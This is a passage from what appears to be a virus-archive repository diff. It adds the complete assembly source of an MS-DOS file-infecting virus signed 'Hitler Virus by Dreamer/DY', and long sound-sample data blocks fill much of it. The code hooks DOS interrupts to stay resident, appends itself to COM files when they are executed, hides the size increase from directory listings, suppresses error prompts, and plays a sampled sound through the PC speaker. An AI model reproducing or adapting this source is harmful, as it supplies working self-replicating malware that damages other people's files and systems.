db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt: ; DREAMER has a weird sense of humor
size equ $-100h
pgf equ ($+16)/16

701
MSDOS/Virus.MSDOS.Unknown.hitler.asm Normal file
View File

@ -0,0 +1,701 @@
call rakett
old db <20>!­'
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh
int 21h
jnc failed
cli
mov ax,3521h
int 21h
mov w [bp+offset old21],bx
mov w [bp+offset old21+2],es
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380
sti
call normalspeed
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21
int 21h
mov al,1Ch
mov dx,offset ni1C
int 21h
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret
findFCB: popf
call int21
pushf
or al,al
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax
push bx
push dx
push es
mov ah,2Fh
call int21
cmp byte es:[bx],0FFh
jne normFCB
add bx,8
normFCB: mov al,byte es:[bx+16h]
and al,31
xor al,31
jnz shitFCB
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size
sbb dx,0
jc shitFCB
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB:
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h
je findFCB
cmp ah,12h
je findFCB
cmp ax,42ABh
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h
jne not_4B00
call install_24
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h
call int21
jc back1
mov cs:old_attr,cx
test cl,4
jnz back1
mov ax,4301h
xor cx,cx
call int21
jc back1
push dx
push ds
call infect
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h
call int21
jnc okay_open
bad1: ret
okay_open: xchg bx,ax
mov ax,5700h
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh
mov cx,5
mov dx,offset old
push cs
pop ds
call int21
jc close
cmp al,5
jne close
cmp word old[0],'MZ'
je close
cmp word old[0],'ZM'
je close
cmp old[0],0E9h
jne infect1
cmp word old[3],'­!'
jne infect1
close: pop dx
pop cx
mov ax,5701h
call int21
mov ah,3Eh
call int21
ret
infect1: mov ax,4202h
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000
jae close
dec ax
dec ax
dec ax
mov word ptr putjmp[1],ax
mov ah,40h
mov cx,size
mov dx,100h
call int21
jc close
cmp ax,size
jne close
mov ax,4200h
xor cx,cx
xor dx,dx
call int21
mov ah,40h
mov cx,5
mov dx,offset putjmp
call int21
or byte ss:[bp],31
jmp close
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf
cli
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
cmp teller,0
je teller_ok
dec teller
jmp noreset
teller_ok:
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample
jb noreset
mov xofs,offset sample
noreset:
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
